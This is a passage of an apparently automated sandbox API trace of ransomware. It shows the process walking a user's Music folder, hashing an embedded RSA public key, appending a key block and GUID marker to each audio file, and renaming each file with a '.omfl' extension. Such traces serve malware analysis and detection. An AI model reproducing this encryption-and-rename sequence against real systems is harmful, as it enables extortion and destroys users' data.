phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.480] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.480] CryptHashData (hHash=0xdce3b30, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.480] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.480] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.480] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.480] GetLastError () returned 0x0 [0131.481] CryptDestroyHash (hHash=0xdce3b30) returned 1 [0131.481] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.481] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.481] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.481] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.481] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.481] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.482] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.482] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xbb73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.482] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.482] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.482] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.482] CloseHandle (hObject=0x5c8) returned 1 [0131.484] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.484] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.484] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UnxFEG-UZAK1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\unxfeg-uzak1.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UnxFEG-UZAK1.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\unxfeg-uzak1.mp3.omfl")) returned 1 [0131.486] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe55eda80, ftCreationTime.dwHighDateTime=0x1d5e21f, ftLastAccessTime.dwLowDateTime=0x2a998410, ftLastAccessTime.dwHighDateTime=0x1d5df96, ftLastWriteTime.dwLowDateTime=0x2a998410, ftLastWriteTime.dwHighDateTime=0x1d5df96, nFileSizeHigh=0x0, nFileSizeLow=0xb575, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V dlRLQOQ5zliXjs2.m4a", cAlternateFileName="VDLRLQ~1.M4A")) returned 1 [0131.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.486] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\V dlRLQOQ5zliXjs2.m4a") returned=".m4a" [0131.486] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\V dlRLQOQ5zliXjs2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\v dlrlqoq5zlixjs2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.486] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=46453) returned 1 [0131.486] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.490] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xb54f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.490] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.491] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xb575, lpOverlapped=0x0) returned 1 [0131.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.492] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0131.493] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.493] CryptHashData (hHash=0xdce3b30, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.493] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.493] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.493] GetLastError () returned 0x0 [0131.493] CryptDestroyHash (hHash=0xdce3b30) returned 1 [0131.493] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0131.493] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.493] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.493] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.494] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.494] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xb575, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.494] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.495] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.495] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.495] CloseHandle (hObject=0x5c8) returned 1 [0131.497] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.498] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.498] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\V dlRLQOQ5zliXjs2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\v dlrlqoq5zlixjs2.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\V dlRLQOQ5zliXjs2.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\v dlrlqoq5zlixjs2.m4a.omfl")) returned 1 [0131.501] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a7ce310, ftCreationTime.dwHighDateTime=0x1d5e44b, ftLastAccessTime.dwLowDateTime=0xae4f07f0, ftLastAccessTime.dwHighDateTime=0x1d5df8f, ftLastWriteTime.dwLowDateTime=0xae4f07f0, ftLastWriteTime.dwHighDateTime=0x1d5df8f, nFileSizeHigh=0x0, nFileSizeLow=0x187b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V8TBDteN WXk80xCqnjc.mp3", cAlternateFileName="V8TBDT~1.MP3")) returned 1 [0131.501] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.501] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.501] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\V8TBDteN WXk80xCqnjc.mp3") returned=".mp3" [0131.501] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\V8TBDteN WXk80xCqnjc.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\v8tbdten wxk80xcqnjc.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e4 [0131.501] GetFileSizeEx (in: hFile=0x6e4, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=100278) returned 1 [0131.502] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.506] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0x18790, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.506] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.507] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.507] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x187b6, lpOverlapped=0x0) returned 1 [0131.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.507] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.508] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0131.509] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.509] CryptHashData (hHash=0xdce3b30, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.509] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.509] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.509] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.509] GetLastError () returned 0x0 [0131.509] CryptDestroyHash (hHash=0xdce3b30) returned 1 [0131.509] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0131.509] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.509] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.509] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.509] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.510] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.510] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.510] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0x187b6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.510] WriteFile (in: hFile=0x6e4, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.511] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.511] WriteFile (in: hFile=0x6e4, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.511] CloseHandle (hObject=0x6e4) returned 1 [0131.517] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.517] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0xdd29950 [0131.517] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\V8TBDteN WXk80xCqnjc.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\v8tbdten wxk80xcqnjc.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\V8TBDteN WXk80xCqnjc.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\v8tbdten wxk80xcqnjc.mp3.omfl")) returned 1 [0131.519] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a7ce310, ftCreationTime.dwHighDateTime=0x1d5e44b, ftLastAccessTime.dwLowDateTime=0xae4f07f0, ftLastAccessTime.dwHighDateTime=0x1d5df8f, ftLastWriteTime.dwLowDateTime=0xae4f07f0, ftLastWriteTime.dwHighDateTime=0x1d5df8f, nFileSizeHigh=0x0, nFileSizeLow=0x187b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V8TBDteN WXk80xCqnjc.mp3", cAlternateFileName="V8TBDT~1.MP3")) returned 0 [0131.519] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0131.519] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750caf0 | out: hHeap=0x4970000) returned 1 [0131.519] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ca08 | out: hHeap=0x4970000) returned 1 [0131.519] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.519] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.519] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.519] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.519] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.519] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.519] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.519] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.519] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.519] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.519] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.519] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.519] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.519] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.519] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.519] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0xdd29950 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd29950 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd29950 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.521] 